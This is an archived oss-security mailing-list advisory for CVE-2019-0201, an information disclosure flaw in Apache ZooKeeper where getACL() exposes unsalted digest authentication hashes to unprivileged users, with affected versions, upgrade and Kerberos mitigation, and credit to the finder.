[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] [CVE-2019-0201] Information disclosure vulnerability in Apache ZooKeeper
From: Andor Molnar <andor () apache ! org>
Date: 2019-05-20 17:15:24
Message-ID: 52C7AFA8-8CAB-4613-95E9-3EED492B9693 () apache ! org
[Download RAW message or body]
CVE-2019-0201: Information disclosure vulnerability in Apache ZooKeeper
Severity: Critical
Vendor: The Apache Software Foundation
Versions Affected: ZooKeeper prior to 3.4.14, ZooKeeper 3.5.0-alpha through 3.5.4-beta. The \
unsupported ZooKeeper 1.x through 3.3.x versions may be also affected.
Description: ZooKeeper's getACL() command doesn't check any permission when retrieves the ACLs \
of the requested node and returns all information contained in the ACL Id field as plaintext \
string. DigestAuthenticationProvider overloads the Id field with the hash value that is used \
for user authentication. As a consequence, if Digest Authentication is in use, the unsalted \
hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.
Mitigation: Use an authentication method other than Digest (e.g. Kerberos) or upgrade to 3.4.14 \
or later (3.5.5 or later if on the 3.5 branch).
Credit: This issue was identified by Harrison Neal <harrison@patchadvisor.com> PatchAdvisor, \
Inc.
References: https://issues.apache.org/jira/browse/ZOOKEEPER-1392
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic